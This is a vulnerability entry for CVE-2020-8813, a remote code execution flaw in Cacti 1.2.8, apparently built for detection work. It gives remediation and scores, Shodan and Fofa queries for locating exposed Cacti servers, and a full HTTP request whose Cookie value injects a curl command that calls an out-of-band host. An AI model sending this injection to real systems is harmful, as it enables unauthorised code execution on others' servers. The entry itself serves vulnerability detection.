🔙 목록으로 돌아가기

CVE-2020-8813: Cacti v1.2.8 - Remote Code Execution

TitleCacti v1.2.8 - Remote Code Execution
Authorgy741
SeverityHigh
ImpactSuccessful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected system.
RemediationUpgrade to a patched version of Cacti v1.2.9 or later to mitigate this vulnerability.
CVSS Score8.8
EPSS Score0.94078
CVE IDCVE-2020-8813
CWE IDCWE-78
Shodan Queryhttp.title:"login to cacti"http.title:"cacti"http.favicon.hash:"-1797138069"
Fofa Queryicon_hash="-1797138069"title="cacti"title="login to cacti"
Tags cve2020 cve cacti rce oast vkev vuln

🔍 Vulnerability Description

Cacti v1.2.8 is susceptible to remote code execution. This vulnerability could be exploited without authentication if “Guest Realtime Graphs” privileges are enabled.

🌐 HTTP Request

GET /graph_realtime.php?action=init HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:135.0) Gecko/20100101 Firefox/135.0
Connection: close
Cookie: Cacti=%3Bcurl%20http%3A//d5jp3ople0o4mj701f50cpcp3e65n68sf.oast.site
Accept-Encoding: gzip

📚 References


🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2020/CVE-2020-8813.yaml

🦈 Packet Capture: ⬇️ Download cve-2020-8813.pcap

⚠️ Notice: These rules are for detection purposes. Please tune them before applying to a production environment.
Snort 2 Rule
N/A
Snort 3 Rule
N/A